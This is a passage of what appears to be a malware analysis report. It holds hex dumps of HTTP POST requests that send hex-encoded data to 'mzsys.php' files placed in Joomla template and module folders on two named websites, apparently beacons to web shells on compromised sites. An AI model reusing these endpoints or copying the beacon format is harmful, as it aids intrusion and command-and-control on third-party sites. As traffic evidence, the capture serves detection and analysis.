0x00000150 (00336)   36323333 30334336 42374431 41463131   623303C6B7D1AF11
0x00000160 (00352)   41453946 41384133 31394336 42344543   AE9FA8A319C6B4EC
0x00000170 (00368)   46383344 45453131 43454634 41413745   F83DEE11CEF4AA7E
0x00000180 (00384)   42333845 31343636 41384233 32433833   B38E1466A8B32C83
0x00000190 (00400)   43394543 35393236 43313939 39323932   C9EC5926C1999292
0x000001a0 (00416)   43463033 41363141 42323031 32354345   CF03A61AB20125CE
0x000001b0 (00432)   43414441 36423731 41374639 34364133   CADA6B71A7F946A3
0x000001c0 (00448)   44383736 44363531 41334542 41334531   D876D651A3EBA3E1
0x000001d0 (00464)   39433231 34304338 31313145 30374646   9C2140C8111E07FF
0x000001e0 (00480)   35333031 45384341 43443537 37323944   5301E8CACD57729D
0x000001f0 (00496)   30363343 41344246 45353746 37333135   063CA4BFE57F7315
0x00000200 (00512)   45314641 32324234 41373444 45463933   E1FA22B4A74DEF93
0x00000210 (00528)   43354535 38314230 31453936 31333833   C5E581B01E961383
0x00000220 (00544)   41354343 44314142 38383345 46313439   A5CCD1AB883EF149
0x00000230 (00560)   36444342 34453446 38323435 45353335   6DCB4E4F8245E535
0x00000240 (00576)   30413437 45353442 39303230 38423944   0A47E54B90208B9D
0x00000250 (00592)   45364539 41433738 33324635 43364637   E6E9AC7832F5C6F7
0x00000260 (00608)   45443239 35393743 44323836 41384432   ED29597CD286A8D2
0x00000270 (00624)   33314333 45434341 41444436 46343631   31C3ECCAADD6F461
0x00000280 (00640)   39364533 44453746 44413032 39453442   96E3DE7FDA029E4B
0x00000290 (00656)   36393145 38334530 36373239 39394141   691E83E0672999AA
0x000002a0 (00672)   35364435 44453645 45394245 35363945   56D5DE6EE9BE569E
0x000002b0 (00688)   44414546 36364134 38373033 37374243   DAEF66A4870377BC
0x000002c0 (00704)   34333436 31453646 33464630 42354338   43461E6F3FF0B5C8
0x000002d0 (00720)   35383841 43303237 36394543 43334534   588AC02769ECC3E4
0x000002e0 (00736)   31393238 39423437 36363730 44314132   19289B476670D1A2
0x000002f0 (00752)   43313243 41373238 44434342 39333845   C12CA728DCCB938E
0x00000300 (00768)   43323042 31314445 30443339 46363646   C20B11DE0D39F66F
0x00000310 (00784)   31373336 34414132 46383036 45433331   17364AA2F806EC31
0x00000320 (00800)   31303039 44334139 44383636 35413835   1009D3A9D8665A85
0x00000330 (00816)   45304539 45433132 35334336 37394137   E0E9EC1253C679A7
0x00000340 (00832)   41373537 32354138 42434239 31374633   A75725A8BCB917F3
0x00000350 (00848)   41463531 45444339 31334342 46333439   AF51EDC913CBF349
0x00000360 (00864)   45393932 38353034 30314636 36364439   E992850401F666D9
0x00000370 (00880)   45444437 45434132 39374330 32433337   EDD7ECA297C02C37
0x00000380 (00896)   45383245 42304630 37344542 37354337   E82EB0F074EB75C7
0x00000390 (00912)   36333045 33344544 38323836 41434433   630E34ED8286ACD3
0x000003a0 (00928)   31374339 46444636 41453436 30443331   17C9FDF6AE460D31
0x000003b0 (00944)   37433946 44463641 45343630 44343630   7C9FDF6AE460D460
0x000003c0 (00960)   44bdf9                                D..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a206e 2c202c20 2c202c20 2c202c20   t: n, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d45 37383843 31453739   ..data=E788C1E79
0x00000160 (00352)   36374535 38333136 38314245 32433443   67E5831681BE2C4C
0x00000170 (00368)   36463934 45374543 44363233 33303343   6F94E7ECD623303C
0x00000180 (00384)   36423744 31414631 31414539 46413841   6B7D1AF11AE9FA8A
0x00000190 (00400)   33313943 36423445 43463833 44454531   319C6B4ECF83DEE1
0x000001a0 (00416)   31434546 34414137 45423338 45313436   1CEF4AA7EB38E146
0x000001b0 (00432)   36413842 33324338 33433945 43353932   6A8B32C83C9EC592
0x000001c0 (00448)   36433139 39393239 32434630 33413631   6C1999292CF03A61
0x000001d0 (00464)   41423230 31323543 45434144 41364237   AB20125CECADA6B7
0x000001e0 (00480)   31413746 39343641 33443837 36443635   1A7F946A3D876D65
0x000001f0 (00496)   31413345 42413345 31394332 31343043   1A3EBA3E19C2140C
0x00000200 (00512)   38313131 45303746 46353330 31453843   8111E07FF5301E8C
0x00000210 (00528)   41434435 37373239 44303633 43413442   ACD57729D063CA4B
0x00000220 (00544)   46453537 46373331 35453146 41323242   FE57F7315E1FA22B
0x00000230 (00560)   34413734 44454639 33433545 35383142   4A74DEF93C5E581B
0x00000240 (00576)   30314539 36313338 33413543 43443141   01E961383A5CCD1A
0x00000250 (00592)   42383833 45463134 39364443 42344534   B883EF1496DCB4E4
0x00000260 (00608)   46383234 35453533 35304134 37453534   F8245E5350A47E54
0x00000270 (00624)   42393032 30384239 44453645 39414337   B90208B9DE6E9AC7
0x00000280 (00640)   38333246 35433646 37454432 39353937   832F5C6F7ED29597
0x00000290 (00656)   43443238 36413844 32333143 33454343   CD286A8D231C3ECC
0x000002a0 (00672)   41414444 36463436 31393645 33444537   AADD6F46196E3DE7
0x000002b0 (00688)   46444130 32394534 42363931 45383345   FDA029E4B691E83E
0x000002c0 (00704)   30363732 39393941 41353644 35444536   0672999AA56D5DE6
0x000002d0 (00720)   45453942 45353639 45444145 46363641   EE9BE569EDAEF66A
0x000002e0 (00736)   34383730 33373742 43343334 36314536   4870377BC43461E6
0x000002f0 (00752)   46334646 30423543 38353838 41433032   F3FF0B5C8588AC02
0x00000300 (00768)   37363945 43433345 34313932 38394234   769ECC3E419289B4
0x00000310 (00784)   37363637 30443141 32433132 43413732   76670D1A2C12CA72
0x00000320 (00800)   38444343 42393338 45433230 42313144   8DCCB938EC20B11D
0x00000330 (00816)   45304433 39463636 46313733 36344141   E0D39F66F17364AA
0x00000340 (00832)   32463830 36454333 31313030 39443341   2F806EC311009D3A
0x00000350 (00848)   39443836 36354138 35453045 39454331   9D8665A85E0E9EC1
0x00000360 (00864)   32353343 36373941 37413735 37323541   253C679A7A75725A
0x00000370 (00880)   38424342 39313746 33414635 31454443   8BCB917F3AF51EDC
0x00000380 (00896)   39313343 42463334 39453939 32383530   913CBF349E992850
0x00000390 (00912)   34303146 36363644 39454444 37454341   401F666D9EDD7ECA
0x000003a0 (00928)   32393743 30324333 37453832 45423046   297C02C37E82EB0F
0x000003b0 (00944)   30373445 42373543 37363330 45333445   074EB75C7630E34E
0x000003c0 (00960)   44383238 36414344 33313743 39464446   D8286ACD317C9FDF
0x000003d0 (00976)   36414534 363044                       6AE460D

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d4537 38384331 45373936 37453538   a=E788C1E7967E58
0x00000150 (00336)   33313638 31424532 43344336 46393445   31681BE2C4C6F94E
0x00000160 (00352)   37454344 36323333 30334336 42374431   7ECD623303C6B7D1
0x00000170 (00368)   41463131 41453946 41384133 31394336   AF11AE9FA8A319C6
0x00000180 (00384)   42344543 46383344 45453131 43454634   B4ECF83DEE11CEF4
0x00000190 (00400)   41413745 42333845 31343636 41384233   AA7EB38E1466A8B3
0x000001a0 (00416)   32433833 43394543 35393236 43313939   2C83C9EC5926C199
0x000001b0 (00432)   39323932 43463033 41363141 42323031   9292CF03A61AB201
0x000001c0 (00448)   32354345 43414441 36423731 41374639   25CECADA6B71A7F9
0x000001d0 (00464)   34364133 44383736 44363531 41334542   46A3D876D651A3EB
0x000001e0 (00480)   41334531 39433231 34304338 31313145   A3E19C2140C8111E
0x000001f0 (00496)   30374646 35333031 45384341 43443537   07FF5301E8CACD57
0x00000200 (00512)   37323944 30363343 41344246 45353746   729D063CA4BFE57F
0x00000210 (00528)   37333135 45314641 32324234 41373444   7315E1FA22B4A74D
0x00000220 (00544)   45463933 43354535 38314230 31453936   EF93C5E581B01E96
0x00000230 (00560)   31333833 41354343 44314142 38383345   1383A5CCD1AB883E
0x00000240 (00576)   46313439 36444342 34453446 38323435   F1496DCB4E4F8245
0x00000250 (00592)   45353335 30413437 45353442 39303230   E5350A47E54B9020
0x00000260 (00608)   38423944 45364539 41433738 33324635   8B9DE6E9AC7832F5
0x00000270 (00624)   43364637 45443239 35393743 44323836   C6F7ED29597CD286
0x00000280 (00640)   41384432 33314333 45434341 41444436   A8D231C3ECCAADD6
0x00000290 (00656)   46343631 39364533 44453746 44413032   F46196E3DE7FDA02
0x000002a0 (00672)   39453442 36393145 38334530 36373239   9E4B691E83E06729
0x000002b0 (00688)   39394141 35364435 44453645 45394245   99AA56D5DE6EE9BE
0x000002c0 (00704)   35363945 44414546 36364134 38373033   569EDAEF66A48703
0x000002d0 (00720)   37374243 34333436 31453646 33464630   77BC43461E6F3FF0
0x000002e0 (00736)   42354338 35383841 43303237 36394543   B5C8588AC02769EC
0x000002f0 (00752)   43334534 31393238 39423437 36363730   C3E419289B476670
0x00000300 (00768)   44314132 43313243 41373238 44434342   D1A2C12CA728DCCB
0x00000310 (00784)   39333845 43323042 31314445 30443339   938EC20B11DE0D39
0x00000320 (00800)   46363646 31373336 34414132 46383036   F66F17364AA2F806
0x00000330 (00816)   45433331 31303039 44334139 44383636   EC311009D3A9D866
0x00000340 (00832)   35413835 45304539 45433132 35334336   5A85E0E9EC1253C6
0x00000350 (00848)   37394137 41373537 32354138 42434239   79A7A75725A8BCB9
0x00000360 (00864)   31374633 41463531 45444339 31334342   17F3AF51EDC913CB
0x00000370 (00880)   46333439 45393932 38353034 30314636   F349E992850401F6
0x00000380 (00896)   36364439 45444437 45434132 39374330   66D9EDD7ECA297C0
0x00000390 (00912)   32433337 45383245 42304630 37344542   2C37E82EB0F074EB
0x000003a0 (00928)   37354337 36333045 33344544 38323836   75C7630E34ED8286
0x000003b0 (00944)   41434433 31374339 46444636 41453436   ACD317C9FDF6AE46
0x000003c0 (00960)   30443238 36414344 33313743 39464446   0D286ACD317C9FDF
0x000003d0 (00976)   36414534 363044                       6AE460D


Strings